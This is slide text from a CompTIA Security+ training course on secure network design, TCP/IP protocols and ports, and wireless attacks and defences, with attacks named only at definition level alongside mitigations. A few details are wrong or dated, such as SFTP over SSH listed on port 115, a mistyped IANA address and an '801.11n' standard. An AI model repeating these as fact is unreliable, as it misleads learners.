Flood Guards Protections in place to avoid large amounts of a type of traffic and lower the likelihood of DoS attacks
Loop Protection Using the STP and TTL counters to prevent repeating transmission pathways or bridge loops
Spanning Tree Protocol (STP)
A tree list of all available connections. Used to prevent looping and help determine the least cost path
Network Bridging Using a multihomed device with more than one network interface to connect separate networks
CompTIA Security+ Training
Secure Network Administration
What We Covered
Rule-based Management
Access Control Lists (ACL)
Firewall Rules
Secure Router Configuration
Port Security
Flood Guards
Loop Prevention
Network Separation and Network Bridging
Log Analysis
CompTIA Security+ Training Instructor: Lisa Szpunar
Secure Network Design
CompTIA Security+ Training
Secure Network Design
In This Lesson:
Security Zones
DMZ (Demilitarized Zone)
Subnetting
Virtual LAN (VLAN)
Network Address Translation (NAT)
Remote Access
Virtual Private Network (VPN)
Telephony
Network Access Control (NAC)
Virtualization
Cloud Computing
Exam Objectives: 1.3 Distinguish and differentiate network
design elements and compounds
Security Zones
T h
r e
a t
L
e v
e l
Low
Extremely High
Extranet
Internet
DMZ
Intranet
The global system of interconnected networks that can be accessed by anyone. Assume and prepare for the worst
An perimeter network isolated from the internal network where web servers, mail servers, and other public facing services live
Web like services and other services that are in the internal network and can be accessed by employees or trusted guests
An Intranet extended to select trusted third parties like vendors or contractors. All users must still authenticate
The global system of interconnected networks that can be accessed by anyone. Assume and prepare for the worst
An perimeter network isolated from the internal network where web servers, mail servers, and other public facing services live
An Intranet extended to select trusted third parties like vendors or contractors. All users must still authenticate
Security Zones
T h
r e
a t
L
e v
e l
Low
Extremely High
Extranet
Internet
DMZ
Intranet
Web like services and other services that are in the internal network and can be accessed by employees or trusted clients
Intranet Best Practices
• Have a firewall and proxy at the edge of the intranet filtering inbound and outbound traffic
• Implement IPSec for communications between internal hosts and server
• Have enterprise level and host level antivirus software
• Write, implement, and audit security policy
• Least privilege and implicit deny
The global system of interconnected networks that can be accessed by anyone. Assume and prepare for the worst
An perimeter network isolated from the internal network where web servers, mail servers, and other public facing services live
Web like services and other services that are in the internal network and can be acceded by employees or trusted clients
Security Zones
T h
r e
a t
L
e v
e l
Low
Extremely High
Extranet
Internet
DMZ
Intranet
An Intranet extended to select trusted third parties like vendors or contractors. All users must still authenticate
Extranet Best Practices
• Use digital certificates along with usernames and passwords to authenticate
• Use tunneling across the public internet to connect external users
Web like services and other services that are in the internal network and can be acceded by employees or trusted clients
The global system of interconnected networks that can be accessed by anyone. Assume and prepare for the worst
An Intranet extended to select trusted third parties like vendors or contractors. All users must still authenticate
Security Zones
T h
r e
a t
L
e v
e l
Low
Extremely High
Extranet
Internet
DMZ
Intranet
An perimeter network isolated from the internal network where web servers, mail servers, and other public facing services live
DMZ Best Practices
• Have one!
• Use the layered firewall approach instead of a single multi-homed firewall
• Regularly back up data in the DMZ and don’t keep the only copy of something in the DMZ
An perimeter network isolated from the internal network where web servers, mail servers, and other public facing services live
Web like services and other services that are in the internal network and can be acceded by employees or trusted clients
An Intranet extended to select trusted third parties like vendors or contractors. All users must still authenticate
Security Zones
T h
r e
a t
L
e v
e l
Low
Extremely High
Extranet
Internet
DMZ
Intranet
The global system of interconnected networks that can be accessed by anyone. Assume and prepare for the worst
Internet Best Practices
• Consider all interactions to be potential attacks
• Use tunneling and encryption whenever communicating sensitive data over the public internet
• Educate your users and have acceptable use polices for internet usage
CompTIA Security+ Training
Secure Network Design
• Why a DMZ?
–Servers exist that users outside the LAN need to access
• Email, IIS, FTP, DNS, IPS, honeypots, …
–Public facing servers are the most vulnerable
–They still need protection and limited access to internal hosts
–Servers in the DMZ can provide services to both internal and external clients while maintaining security
• Security Function
–Adds a layer of security between the LAN and the public internet
–Attackers only have access to the perimeter machines
DMZ (Demilitarized Zone) DMZ
CompTIA Security+ Training
Secure Network Design
• Multiple Interfaces
–1 firewall with 3 or more
network interfaces
–Can be less secure
DMZ Design
Protected Network
Internet
Multi-homed Firewall
DMZ
FTP Server Mail Server
CompTIA Security+ Training
Secure Network Design
• Layered
–Put DMZ systems between two separate firewalls
–Can be more secure
DMZ Design
Protected Network Internet
Front-end Firewall
Back-end Firewall
DMZ
FTP Server Mail Server
CompTIA Security+ Training
Secure Network Design
• Process of taking a large network and dividing it into smaller networks to increase efficiency and manageability
Example:
–Before
–After
Subnetting
Accounting Subnet 192.168.1.0 254 hosts
Customer Service Subnet 192.168.2.0 254 hosts
Marketing Subnet 192.168.3.0 254 hosts
Subnet Mask 255.255.255.0
Whole Network 192.168.0.0 65534 hosts
Subnet Mask 255.255.0.0
CompTIA Security+ Training
Secure Network Design
• Security Functions
–Network separation
–Easier to administer
–Speed up the network
Subnetting
CompTIA Security+ Training
Secure Network Design
• VLAN Basics
–A VLAN is:
• A group of hosts, servers, and users that are logically connected by layer 2 switches
• An isolated broadcast domain
–Trunks use a point-to-point connection to physically connect each switch that are part of the same VLAN
Virtual Local Area Network (VLAN)
CompTIA Security+ Training
Secure Network Design
• Use VLANs to
–Confine traffic to one area of the network
–Hide segments of the network from other segments to control access
–Control the path that data takes from one point to another
–Segment off users with common needs and data sensitivity levels together
• Security Considerations
–Do not use VLAN as a security measure by itself
– Layer 2 switching is not stateful
–Vulnerabilities
• MAC flooding, spanning tree attack, ARP spoofing, more
VLAN Management
CompTIA Security+ Training
Secure Network Design
Network Address Translation (NAT)
• Translates between two addressing schemes – internal and external IP addresses
– Firewalls, routers, proxies
• Developed to conserve IPv4 addresses
• Also performs vital security roles
–Hides the structure and addressees of the internal network
–Forces all inbound/outbound traffic through a perimeter device
Static NAT A 1:1 scheme used for incoming communication with services like a web server
Dynamic NAT A pool of public addresses assigned to internal addresses for outbound communication
Port Address Translation PAT allows a single public IP address to be used for multiple simultaneous connections from internal clients
CompTIA Security+ Training
Secure Network Design
• Source Network Address Translation
–Keeps internal machines and network topology anonymous
– Internal machines are inaccessible unless they have requested communication
Network Address Translation (NAT)
Internet
192.168.42.3
192.168.42.4
192.168.42.11
75.27.113.72 Public 192.168.42.1 LAN
NAT Device
I would like to access
TrainSignal.com TrainSignal.com responds to 75.27.113.72
CompTIA Security+ Training
Secure Network Design
• Destination Network Address Translation
–A firewall with NAT can be configured to only let specific types of traffic through
Network Address Translation (NAT)
Internet
Protected Network
Edge Email Server
I would like to access your
email server at 75.27.113.73
192.168.42.3
75.27.113.73 Public 192.168.42.1 LAN
NAT Device
CompTIA Security+ Training
Secure Network Design
• Sharing resources between physically separated LANs and users
• Remote Access Concepts
–Remote Access Server
• Establishes and supports remote connections
–Remote Authentication
• The method used to authenticate remote users
– RADIUS, TACACS, CHAP, 802.1x
–Point-to-Point Protocol (PPP)
• Encapsulation using Network Control Protocol (NCP)
• Authentication using Link Control Protocol (LCP)
• No encryption – not secure
• Use aline only on dedicated connections and dial-up
Remote Access
CompTIA Security+ Training
Secure Network Design
• Tunneling
–Encapsulating packets before sending them over the public internet
• Tunneling Protocols
– Layer 2 Tunneling Protocol (L2TP)
• Integrity, confidentiality, authentication, replay prevention
• Does not offer encryption on its own – uses IPSec
• Two levels of authentication: computer level and user level
–Point-to-Point Tunneling Protocol (PPTP)
• Older, less secure, less flexible
– Internet Protocol Security (IPSec)
• Not a true protocol but a standard for encrypting data
• Network layer
Remote Access
CompTIA Security+ Training
Secure Network Design
• A private network connection that happens over the public network
• Provides authentication, access control, confidentiality, and integrity
• Used to connect physically separated LANs or to allow remote users to access LAN resources
• Employs tunneling to keep this communication private
• Tunneling only provides some protection
–Need encryption like IPSec
Virtual Private Network (VPN)
CompTIA Security+ Training
Secure Network Design
Virtual Private Network (VPN)
Remote User
• Site-to-site VPN
–Home office and branch office appear to be logically connected
• Remote Access VPN
–Remote user has VPN client software installed
Branch Office LAN
Internet
CompTIA Security+ Training
Secure Network Design
• VPN Best Practices
–Avoid PPTP if possible
– Instead use L2TP with IPSec
–Use the strongest encryption and authentication available
–Keep disconnected when not in use
– Force re-authentication for long sessions
–Use extra layers of intrusion detection, access control, and policy compliance (NAC) for users that are connecting from locations outside the company LANs
Virtual Private Network (VPN)
CompTIA Security+ Training
Secure Network Design
PBX / Telecom
• Private Branch Exchange
• Used in larger organizations
• Routes many internal extensions out on limited public phone numbers
• Feature rich
Telephony
VoIP
• Voice over IP
• Tunneling voice and other data over the existing network and public internet
• Offers video conferencing
• Cost saving
PBX Security Concerns
•Denial-of-service
•Modern phreakers
• Remote access – turn off if no
maintenance is being performed
VoIP Security Concerns
• Vishing and Caller ID Spoofing
•Denial-of-service
• Sniffing
• Extra security: Encrypt with VPN
CompTIA Security+ Training
Secure Network Design
• A baseline security standard that a workstation must adhere to before it can interact with network resources
–Updates and patches installed
–Antivirus software running and updated
–Other configuration policies
–Must authenticate as a trusted machine/user
• Software client installed on each workstation that communicates with the NAC appliance
–Standard met: can connect as normal
–Standard not met: blocked or remediation is attempted
• Called Network Admission Control by Cisco
• Called Network Access Protection by Microsoft
Network Access Control (NAC)
CompTIA Security+ Training
Secure Network Design
• Security Considerations
– If a VM is compromised can malware or an attacker break out of the virtual machine?
• This has never been seen in “the wild”
• Keep up to date on virtualization news to keep track of this idea
–Misconfiguration is the biggest concern
• Virtual environments can grow very quickly
• Dynamic environments
• Stale, unpatched, and forgotten systems
• Virtual networking is the biggest area for misconfiguraiton
–A denial-of-service attack on one VM can effect the performance of the other VMs in the cluster
Virtualization
CompTIA Security+ Training
Secure Network Design
• Security Best Practices
–Use security tools that are created for virtualization
• vShield, Hytrust, more
–Use design guides, hardening papers, and other resources for solid virtual architecture
–Virtual machines have the same risks as physical machines
• Do everything we are discussing in this course on the VM’s too
– Log analysis, auditing, least privilege, baselining, hardening, security policies, everything!
Virtualization
CompTIA Security+ Training
Secure Network Design
• Security Best Practices
–Employ security at each layer of the virtual environment
Virtualization
Hypervisor
Physical Networking Devices
Physical Host
Virtual Machines
Hypervisor
CompTIA Security+ Training
Secure Network Design
Cloud Computing
Software as a Service Offering software to end users from within the cloud instead of installing it on each hardware machine
Platform as a Service Apps can be created and run on a cloud-based platform
Infrastructure as a Service Contracting data centers, VMs, or other infrastructure services
Internet
IaaS
PaaS
SaaS
CompTIA Security+ Training
Secure Network Design
• Security Considerations
–The third party
• Time delay
• Regulatory compliance
• Data mingling
–You are ultimately responsible
• Encrypt data before it leaves your site
Cloud Computing
CompTIA Security+ Training
Secure Network Design
Key Terms You Should Know
Term Definition
Bastion Host A device that is visible to the public internet and specifically configured to withstand attacks
Multi-homed A device that has more then one network interface
Broadcast Domain A segment of a network where all the nodes can reach each other by broadcast at the data link layer
Phreaker A person who exploits or attacks telephone systems
Private Branch Exchange
(PBX)
A telephone routing system for use by businesses that allows many local extensions to use a limited number of public phone numbers
Voice over IP (VoIP)
Sending of voice communications and other media data over IP
CompTIA Security+ Training
Secure Network Design
Key Terms You Should Know
Term Definition
Point-to-Point Protocol (PPP)
A data link protocol used to send IP packets between two directly connected nodes
Tunneling Encapsulating packets to create a secure path through an unsecured network
Layer 2 Tunneling Protocol (L2TP)
A protocol used to create VPN tunnels by encapsulating PPP packets
Point-to-Point Tunneling
Protocol (PPTP)
An older protocol used to create VPN tunnels by encapsulating PPP packets. Initialization is not encrypted
CompTIA Security+ Training
Secure Network Design
Key Terms You Should Know
Term Definition
Demilitarized Zone (DMZ)
A semi-protected network segment that separates the local network from the public internet
Subnetting Using separate IP address ranges to split a network into segments
Virtual LAN (VLAN) Separating a network/subnet into separate logical segments even though they share a common network switch
Network Address Translation (NAT)
Readdressing packets between local non-routeable and public addresses at the network boundary gateway
CompTIA Security+ Training
Secure Network Design
Key Terms You Should Know
Term Definition
Remote Access Allowing physically separated users and LANs to share resources
Virtual Private Network (VPN)
A networking technique used to send private data through a public network by creating a secure path through the public network.
Telephony The technology of voice data service
Network Access Control (NAC)
Monitoring and remediating client security before allowing them to access the internal network
CompTIA Security+ Training
Secure Network Design
What We Covered
Security Zones
DMZ (Demilitarized Zone)
Subnetting
Virtual LAN (VLAN)
Network Address Translation (NAT)
Remote Access
Virtual Private Network (VPN)
Telephony
Network Access Control (NAC)
Virtualization
Cloud Computing
CompTIA Security+ Training Instructor: Lisa Szpunar
TCP/IP Protocols and Port Security
CompTIA Security+ Training
TCP/IP Protocols and Port Security
In This Lesson:
Exam Objectives: 1.4 Implement and use common protocols
1.5 Identify commonly used default network ports
TCP/IP
Application Layer
• FTP
• SSH and SCP
• Telnet
• SMTP
• DNS
• TFTP
• HTTP
• SFTP
• SNMP
• HTTPS
• FTPS
• SSL and TLS
Transport Layer
• TCP
• UDP
Internet Layer
• IP
– IPv4 vs. IPv6
• ICMP
• ARP
IPSec
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Network Access Layer
Internet Layer
Transport Layer
Application Layer
TCP/IP
• Internet Protocol Suite
• A suite of protocols used to communicate between hosts
• Each layer has it own rules and protocols
• The layers only pass information to and from the layer directly above or below it
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Network Access Layer
Internet Layer
Transport Layer
Application Layer
Provides the application layer with session and datagram services, reliability, flow control, and multiplexing. Also called the host-to-host layer
Does process-to-process communications
across an IP network
Responsible for packaging,
addressing, and routing IP packets
Places and removes packets on the physical network. Also called the Link Layer
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Network Access Layer
Internet Layer
Transport Layer
Application Layer Payload
Message
Segment
Datagram
Frame
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Network Access Layer
Internet Layer
Transport Layer
Application Layer
FTP
• Description
– File Transfer Protocol
–Used for remote data access
– File transfer
• Client to server
• Server to client
–Widely available and widely used
• Security Considerations
–Provides basic access control with file permissions
–Not secure – transmissions sent in plain text
• Credentials can be sniffed and used for MitM or replay
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Network Access Layer
Internet Layer
Transport Layer
Application Layer
SSH and SCP
• SSH Description
–Secure Shell
–A tunneling protocol
–Used alone for remote configuration
–Add security to other protocols
• Security Considerations
–Encrypts transmissions for confidentiality
–SSH-2 has strong integrity checking
–Uses PKI for authentication
• Secure Copy (SCP)
–Used for secure unattended file transfer
–Uses SSH for authentication and confidentiality
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Network Access Layer
Internet Layer
Transport Layer
Application Layer
Telnet
• Description
–Used for remote access and
remote configuration
• Security Considerations
–No encryption – all communications sent in clear text
–Do not make Telnet sessions between the internal and external network
–Disable port 23 if not needed
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Network Access Layer
Internet Layer
Transport Layer
Application Layer
SMTP
• Description
–Simple Mail Transfer Protocol
–Used for email delivery
–POP and IMAP move mail from server to client
• Security Considerations
–No encryption on its own
• Uses S/MIME and PGP for encryption
–Disable the SMTP open relay feature
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Network Access Layer
Internet Layer
Transport Layer
Application Layer
DNS
• Description
–Domain Name System/Service
–Used to switch between IP addresses
and human friendly hostnames
• Security Considerations
–Vulnerable to DNS poisoning
–Can be spoofed for phishing
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Network Access Layer
Internet Layer
Transport Layer
Application Layer
TFTP
• Description
–Trivial File Transfer Protocol
–Can be used to transfer files unattended
without user interaction
• Security Considerations
–No security at all
–No error checking
–Anonymous
–Avoid!
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Network Access Layer
Internet Layer
Transport Layer
Application Layer
HTTP
• Description
–Hypertext Transfer Protocol
–Rules for viewing text and other media file types on the web
–A web servers wait for http requests and responds as they arrive
• Security Considerations
–Header injection
–Man-in-the-Middle
–Eavesdropping
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Network Access Layer
Internet Layer
Transport Layer
Application Layer
SFTP
• Description
–Secure FTP
or
–SSH File Transfer Protocol
–Provides remote file transfer, access, and management
• Security Considerations
–Encrypts control info and data with SSH
• Note: Do not confuse with “FTP over SSH”
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Network Access Layer
Internet Layer
Transport Layer
Application Layer
SNMP
• Description
–Simple Network Management Protocol
–Used for remote management, reporting, and maintenance for IP network devices
– Install agent software is on the devices you want to manage
–Use network management system to manage all the nodes from one place
• Security Considerations
–Brute force attack
–Dictionary attack
–Some versions are vulnerable to sniffing
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Network Access Layer
Internet Layer
Transport Layer
Application Layer
HTTPS
• Description
–Hypertext Transfer Protocol Secure
or
–Hypertext Transfer Protocol over SSL
–Used for secure webpages
• Security Considerations
–HTTP over SSL or TLS for encryption
–Can be used for client authentication
• Note: Do not confuse with S-HTTP
–Secure Hypertext Transfer Protocol
–Adds messages security with RSA or digital certificates
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Network Access Layer
Internet Layer
Transport Layer
Application Layer
FTPS
• Description
– FTP Secure
or
– FTP over SSL
–Used for secure file transfer
• Security Considerations
–Uses TLS/SSL for encryption
–You can turn the encryption off
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Network Access Layer
Internet Layer
Transport Layer
Application Layer
SSL and TLS
• SSL
– Secure Sockets Layer
– A cryptographic tool
– Widespread implementations
• TLS
– Transport Layer Security
– Newer, based on SSL
• Security Considerations
– Adds confidentiality and data integrity by encapsulating other protocols
– Initiates a stateful session with a handshake procedure
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Network Access Layer
Internet Layer
Transport Layer
Application Layer
TCP
• Description
–Transmission Control Protocol
–Provides session service to
the application layer
• Security Considerations
–One-to-one connection oriented
–Error checking
• The packets arrived and are in the correct order
–Vulnerable to:
• TCP/IP hijacking
• TCP sequence number attack
• TCP SYN flood attack
CompTIA Security+ Training
TCP/IP Protocols and Port Security
TCP
• TCP 3-way Handshake
SYN
SYN/ACK
ACK
CompTIA Security+ Training
TCP/IP Protocols and Port Security
TCP
• TCP 3-way Handshake
Communication Session
CompTIA Security+ Training
TCP/IP Protocols and Port Security
TCP
• TCP/IP Hijacking
The attacker disconnects the host after a communication session has begun and replaces it with another machine with the same IP address (spoofed)
Communication Session
CompTIA Security+ Training
TCP/IP Protocols and Port Security
TCP
• TCP Sequence Number Attack
The attacker takes control of an in-progress communication session by correctly guessing the next sequence number
Communication Session
CompTIA Security+ Training
TCP/IP Protocols and Port Security
TCP
• TCP SYN flood attack
The attacker half opens multiple sessions but never completes the handshakes causing the server to become overloaded
SYN
SYN/ACK
ACK
SYN
SYN/ACK
CompTIA Security+ Training
TCP/IP Protocols and Port Security
UDP
Network Access Layer
Internet Layer
Transport Layer
Application Layer • Description
–User Datagram Protocol
–Provides datagram service
to the application layer
• Security Considerations
–Connectionless
–Faster than TCP
–No error checking
–Vulnerable to UDP flooding attacks
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Network Access Layer
Internet Layer
Transport Layer
Application Layer
IP
• Description
– Internet Protocol
–Used for addressing and routing
• Security Considerations
–Does not verify message
accuracy (leaves this to TCP)
CompTIA Security+ Training
TCP/IP Protocols and Port Security
• IPv4
–32-bit address space
• IPv6
–128-bit longer address
–Mandatory use of IPSec built-in
–New packet format
–More flexible and scalable
IPv4 vs. IPv6
Network Access Layer
Internet Layer
Transport Layer
Application Layer
Both can be run at the same time but they are not directly compatible. A conversion gateway is needed
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Network Access Layer
Internet Layer
Transport Layer
Application Layer
ICMP
• Description
– Internet Control Message Protocol
–Provides reporting and maintenance
–Used to share path information between routers
Example: Use the PING command to
test connectivity between hosts
• Security Considerations
–Ping-of-Death
–Smurf attack
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Network Access Layer
Internet Layer
Transport Layer
Application Layer
ARP
• Description
–Address Resolution Protocol
–Resolves IP address (Internet layer) to the hardware’s network interface addresses (Network Access Layer)
• Security Considerations
–Does not do authentication – relies
on higher layer protocols for that
–Vulnerable to ARP spoofing
• Also called ARP cache poisoning
TCP/IP Ports to Remember
Find more port information at: www.iana.net
Virus
Service Acronym
Service Name Port Number TCP UDP
FTP File Transfer Protocol 20 – data transfer
x 21 – control
SSH Secure Shell 22 x x
SCP Secure Copy 22 x x
TELNET Telnet 23 x
SMTP Simple Mail Transfer Protocol 25 x
TFTP Trivial File Transfer Protocol 69 x
HTTP Hypertext Transfer Protocol 80 x x
POP3 Post Office Protocol v3 110 x
SFTP Secure/SSH File Transfer Protocol 115 x
NetBIOS Network Basic Input/Output System
137 – name service
x x 138 – datagram service
139 – session service
IMAP Internet Message Access Protocol 143 x
HTTPS HTTP Secure 443 x
FTPS FTP Secure 989 – data transfer
x x 990 – control
CompTIA Security+ Training
TCP/IP Protocols and Port Security
• IP Security
• Defines a policy but does not dictate the exact implementation
• Options:
–Authentication Header or Encapsulating Security Payload
–Transport Mode or Tunnel Mode
IPSec
Authentication Header (AH) Encapsulating Security Payload (ESP)
Provides authentication Does authentication and encryption
Digitally signs the packets for authentication and integrity
Adds confidentiality with encryption
CompTIA Security+ Training
TCP/IP Protocols and Port Security
IPSec
Payload IP
Header IPSec
Header
Not Encrypted
Transport Mode
Encapsulates the IP packet’s payload
Makes a secure connection between two host endpoints
Internet
LAN1 LAN2
Transport Mode
CompTIA Security+ Training
TCP/IP Protocols and Port Security
IPSec
Tunnel Mode
Encapsulates the entire IP packet
Makes a secure “hop” between: - Two IPSec gateways - A host and a gateway
Payload IP
Header IPSec
Header
Not Encrypted
Internet
Tunnel Mode
LAN1 LAN2
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Key Terms You Should Know
Acronym Term Function
FTP File Transfer Protocol Used to transfer files from local to remote systems
SSH Secure Shell A more secure alternative to Telnet. Used for remote access and configuration
SCP Secure Copy An unattended file transfer protocol that uses SSH for security
TELNET Telnet An unsecure method to create a terminal connection to remote devices
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Key Terms You Should Know
Acronym Term Function
SMTP Simple Mail Transfer Protocol Used to transfer email
TFTP Trivial File Transfer Protocol A connectionless and unsecure file transfer protocol
HTTP Hypertext Transfer Protocol Used to display multimedia files on the web
SFTP Secure/SSH File Transfer Protocol
An extension of SSH that offers file transfer functionality
SNMP Simple Network Management Protocol
Used to manage and report on network devices
HTTPS HTTP Secure Adds SSL/TLS security to the HTTP protocol
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Key Terms You Should Know
Acronym Term Function
FTPS FTP Secure FTP with added SSL/TLS security
SSL Secure Sockets Layer The predecessor to TLS
TLS Transport Layer Security Provides encryption and authentication to other protocols
TCP Transmission Control Protocol Offers a reliable connection-oriented connection
UDP User Datagram Protocol Offers fast connectionless datagram communication
IP Internet Protocol Responsible for routing packets across network boundaries
CompTIA Security+ Training
TCP/IP Protocols and Port Security
Key Terms You Should Know
Acronym Term Function
IPv6 Internet Protocol Version 6 Offers longer IP address and more security than IPv4
ICMP Internet Control Message Protocol
Used to send pings and error messages
ARP Address Resolution Protocol Resolves IP addresses to network interfaces
IPSec Internet Protocol Security
An open standard that uses AH and ESP to add security features like authentication, data integrity, and confidentiality
CompTIA Security+ Training
TCP/IP Protocols and Port Security
What We Covered
Transport Layer
• TCP
• UDP
Internet Layer
• IP
– IPv4 vs. IPv6
• ICMP
• ARP
IPSec TCP/IP
Application Layer
• FTP
• SSH and SCP
• Telnet
• SMTP
• DNS
• TFTP
• HTTP
• SFTP
• SNMP
• HTTPS
• FTPS
• SSL and TLS
CompTIA Security+ Training Instructor: Lisa Szpunar
Attacks on Wireless Networks
CompTIA Security+ Training
Attacks on Wireless Networks
In This Lesson:
Rogue Access Points
Evil Twin
Wardriving
Warchalking
IV Attack
Packet Sniffing
Attacks on Bluetooth
• Bluejacking
• Bluesnarfing
Interference
Exam Objectives: 3.4 Analyze and differentiate among types of wireless attacks
CompTIA Security+ Training
Attacks on Wireless Networks
• A wireless access point that has not been authorized
• With extended access an attacker can:
–Run key cracking software
–Create an evil twin
–Establish a Man-in-the Middle
Rogue Access Points
Rouge AP Mitigation
•Use an intrusion detection system to report about a new a AP or • Regularly audit your environment to manually to find them
– Have a baseline of all the authorized AP equipment
CompTIA Security+ Training
Attacks on Wireless Networks
• A access point that looks like it is legitimate
–Could use spoofed MAC addresses
• Entices users to connect through it
–Stronger signal
–Friendly name
– Interfere with the signal for the legitimate AP
• Analyzes all transmissions that go through it
Evil Twin
Evil Twin Mitigation
• Educate users about bogus APs at “Wi-Fi hotspots”
• Regularly audit your environment to manually to find them
Wardriving
Looking for open access points or wireless networks with weak encryption
Wardriving
Driving around with:
• A laptop with a NIC set to promiscuous mode
•Often homemade equipment
• Specialized software
Wardriving
Once a network is found
• Run sniffers or key cracking programs
• Use it for free internet access
Wardriving Mitigation
•Use wardriving as a tool to find the open APs before the attackers do
•Watch for unfamiliar cars driving or parking near your buildings
• Look for warchalking symbols
•Don’t have open access points!
Wardriving
CompTIA Security+ Training
Attacks on Wireless Networks
• Using symbols to mark the location of wireless network access points
• For future personal use or to let other wardrivers know
Warchalking
CompTIA Security+ Training
Attacks on Wireless Networks
• Warchalking symbols:
Warchalking
Open Node WEP Node Closed Node
SSID SSID SSID
Bandwidth Bandwidth
Access Contact
W
CompTIA Security+ Training
Attacks on Wireless Networks
• Initialization vector
–Supposed to be used to reduce predictability and repeatability of encryption keys
• The IV is vulnerable to attack if it is
–Too short
–Exchanged in cleartext
–Often repeated
IV Attack
CompTIA Security+ Training
Attacks on Wireless Networks
• IV attacks are used to crack Wireless Equivalent Privacy (WEP)
–RC4 algorithm only has a 24 bit IV causing them to repeat
–The attacker’s cracking program examines the repeating IV datastreams to deduce the secret key
IV Attack
Message Cyphertext IV
Key IV Keystream
Keystream
CompTIA Security+ Training
Attacks on Wireless Networks
What can Eavesdroppers See?
• Installing a sniffer on a wireless network can happen from outside the walls of your building
Packet Sniffing
POP3 email usernames and passwords
Web-based email messages if no encryption is used
FTP usernames and passwords and data
HTTP connections
Instant messages
CompTIA Security+ Training
Attacks on Wireless Networks
• Installing a sniffer on a wireless network can happen from outside the walls of your building
Packet Sniffing
Packet Sniffing Mitigation
•Have layers of protection
– Use strong wireless encryption, don’t broadcast the SSID, and other wireless hardening best practices
– Independently secure all services • Turn on optional encryption •Use VPNs •Don’t use unsecure protocols
•Use sniffers and other network monitoring tools
CompTIA Security+ Training
Attacks on Wireless Networks
• Bluejacking
–Unsolicited messages over Bluetooth (Bluetooth spam)
–Can happen when Bluetooth on a device is set to discoverable
• Bluesnarfing
–Unauthorized access to a device through Bluetooth
–Theft of:
• Contact lists, calendar info, email, texts, images, or video
Attacks on Bluetooth
Bluetooth Attack Mitigation
• Turn Bluetooth off when not in use
•When Bluetooth is turned on make sure it is not discoverable
•Disable Bluetooth on devices that are known to be vulnerable to bluesnarfing
CompTIA Security+ Training
Attacks on Wireless Networks
Interference
• Wireless signals can be corrupted or interfered with
• To do this on purpose is illegal in the US
• There are numerous devices that can cause interference
• Spectrum analyzers are available to see if an attacker (or your own equipment) is interfering with your wireless network
Dealing with Wireless Interference
•Move your access point
• Change the frequency of the access point
• Boost the access point’s signal
• Find the source of the interference
•Notify law enforcement if the interference is intentional
CompTIA Security+ Training
Attacks on Wireless Networks
Key Terms You Should Know
Term Definition
Rogue Access Points
An unauthorized access point to your wireless network
Evil Twin An access point that entices users to connect through it by spoofing a legitimate device or offering exceptional signal strength
Wardriving Trying to discover unprotected or lightly protected wireless networks to use for free or attack
Warchalking Using symbols to share knowledge about the location and details of access points
CompTIA Security+ Training
Attacks on Wireless Networks
Key Terms You Should Know
Term Definition
IV Attack Using initialization vectors that are passed in cleartext to crack weak encryption like WEP
Packet Sniffing Passively analyzing the communications across a network
Bluejacking Unwanted spam messages sent over Bluetooth
Bluesnarfing Unauthorized access and theft of data over Bluetooth
Interference Degrading or completely jamming wireless signals
CompTIA Security+ Training
Attacks on Wireless Networks
What We Covered
Rogue Access Points
Evil Twin
Wardriving
Warchalking
IV Attack
Packet Sniffing
Attacks on Bluetooth
• Bluejacking
• Bluesnarfing
Interference
CompTIA Security+ Training Instructor: Lisa Szpunar
Securing Wireless Networks
CompTIA Security+ Training
Securing Wireless Networks
In This Lesson:
WEP
WPA and WPA2
TKIP
CCMP
WAP
EAP, LEAP, and PEAP
Securing Wireless Routers and Access Points
• SSID Broadcast
• MAC Filter
• Antenna Placement and Power Level Controls
Exam Objectives: 1.6 Implement wireless networks in a secure manner
IEEE 802.11x Wireless Standards
Standard Bandwidth Frequency Compatibility
802.11 1 or 2 Mbps 2.4GHz 802.11
802.11a < 54Mbps 5GHz 802.11a
802.11b < 11Mbps 2.4GHz 802.11b
802.11g < 54Mbps 2.4GHz 802.11g/b
801.11n < 600Mbps 2.4GHz
and 5GHz 802.11n/g/b
802.11i A security amendment that outlines WPA2
For more information: www.standards.ieee.org
CompTIA Security+ Training
Securing Wireless Networks
• Wired Equivalent Privacy
• An older weak 802.11 wireless encryption protocol for WLANs
–Uses the RC4 stream cipher encryption algorithm
–Attempts to do confidentiality and authentication
–Uses a checksum for some integrity
• Vulnerable to IV attacks
–Can be cracked in a few minutes with easily obtainable software
WEP
WEP Best Practices
•Only use WEP if newer protocols are not supported
• Place a WEP access point outside your
firewall and then VPN in
CompTIA Security+ Training
Securing Wireless Networks
• The access points and clients must share a secret key
• Authentication
–Open Authentication
• Knowing the SSID is the only thing clients needs to associate with the AP
• The WEP keys can still be used to encrypt data
– Clients need to have the WEP key in this case
WEP
CompTIA Security+ Training
Securing Wireless Networks
• The access points and clients must share a secret key
• Authentication
–Shared Key Authentication
• Uses a 4 step challenge-response handshake
• Attackers can figure out the key from this handshake
WEP
Authentication Request
Cleartext Challenge
Encrypts cleartext with
WEP key Cyphertext
Decrypts and matches text to original
Positive Reply
CompTIA Security+ Training
Securing Wireless Networks
• Wi-Fi Protected Access
• More secure than WEP alone
• Based on the 802.11i standard
WPA and WPA2
WPA WPA2
Does most of the 802.11i standard Full implementation of the 802.11i
TKIP used for extra encryption layer CCMP used for extra security
RC4 encryption algorithm still used Uses the AES encryption algorithm
Backward compatible with WEP Not backward compatible with WEP
